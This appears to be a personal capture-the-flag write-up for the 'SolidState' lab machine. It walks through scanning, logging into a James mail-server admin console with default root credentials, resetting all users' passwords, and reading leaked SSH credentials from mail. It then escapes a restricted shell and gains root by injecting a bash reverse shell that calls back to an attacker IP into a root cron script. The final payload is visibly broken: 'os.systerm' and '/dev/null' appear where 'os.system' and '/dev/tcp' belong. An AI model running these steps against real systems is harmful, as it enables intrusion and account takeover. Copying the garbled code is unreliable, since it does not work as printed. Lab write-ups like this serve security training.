🟡solidstate

Recon & Enum

port scan

22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip

directory scan

/.html                (Status: 403) [Size: 291]
/images               (Status: 301) [Size: 311] [--> http://10.10.10.51/images/]
/index.html           (Status: 200) [Size: 7776]
/services.html        (Status: 200) [Size: 8404]
/about.html           (Status: 200) [Size: 7183]
/assets               (Status: 301) [Size: 311] [--> http://10.10.10.51/assets/]
/README.txt           (Status: 200) [Size: 963]
/LICENSE.txt          (Status: 200) [Size: 17128]
/.html                (Status: 403) [Size: 291]
/server-status        (Status: 403) [Size: 299]

website

Nothing much over here

rsip

i tried root login with default credentials , and i got access

nc -nv 10.10.10.51 4555
10.10.10.51 4555 (rsip) open
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root.

then i listed all the users and after that , i changed password for every user with pass "kali"

Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

pop3

After that , i jumped to pop3 to watch if their is any mail exists for any of the users , as i have the password now , i used telnet to connect , and i checked for every user

telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
USER mindy
+OK
PASS kali
+OK Welcome mindy
LIST
+OK 0 0

and in mindy user mail , i got something juicy

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: P@55W0rd1!2@

shell as mindy

i got shell as mindy , but its a restricted shell (rbash) , i tried alot things , but none of them work for me

at last i exited , and try ssh with force bash tty , and i got the shell

ssh mindy@10.10.10.51 -t bash

privesc mindy => root

i noticed that , my transferd scripts (linpeas, etc...) in /tmp/ directory are deleted after a while, so i tried pspy pspy64 didn't worked , lets check cpu architecture (bits)

getconf LONG_BIT

system is 32 bit

pspy32

i found a script which is set in cronjob and root executable this is the filewhich is deleting my stuff and it is also a writable python script , lets inject our rev shell in it

cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()
os.systerm('bash -c "bash -i >& /dev/null/10.10.16.4/4433 0>&1"')

and i got a call back on my listner... got the shell as root

Previoussense NextArmageddon

Last updated 2 years ago

hashtagRecon & Enum

hashtagport scan

hashtagdirectory scan

hashtagwebsite

hashtagrsip

hashtagpop3

hashtagshell as mindy

hashtagprivesc mindy => root

hashtagpspy32